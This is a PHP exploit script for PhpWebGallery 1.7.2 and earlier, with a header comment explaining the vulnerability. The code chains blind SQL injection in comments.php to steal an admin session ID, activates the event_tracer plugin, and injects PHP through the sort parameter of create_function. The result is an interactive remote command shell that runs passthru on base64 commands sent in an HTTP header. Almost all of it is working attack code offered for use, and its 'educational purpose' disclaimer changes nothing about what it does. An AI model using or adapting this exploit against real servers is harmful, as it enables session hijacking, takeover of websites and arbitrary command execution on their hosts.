<?php
/*
------------------------------------------------------------------------
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.phpwebgallery.net/
details..: works with at least two rows in _comments table
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /plugins/event_tracer/event_list.php
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;
61. usort(
62. $events,
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )
64. );
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
access to the plugins management interface, but the attacker might be able to retrieve a valid
admin session id using the SQL injection bug in comments.php (see lines 325-340)
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout",5);
define(STDIN, fopen("php://stdin", "r"));
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function check_target()
{
global $host, $path, $prefix, $default_record;
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
$prefix = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
}
function encodeSQL($sql)
{
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
return "CONCAT(0x{$encoded})";
}
function get_sid()
{
global $host, $path, $prefix, $default_record;
$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z
$index = 1;
$sid = "";
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n[-] Fetching admin SID: ";
while (!strpos($sid, chr(0)))
{
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
}
$index++;
}
print "\n";
return $sid;
}
function check_plugin()
{
global $host, $path, $sid;
$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
// check if the event_tracer plugin isn't installed
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = (isset($argv[3])) ? $argv[3] : get_sid();
check_plugin();
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>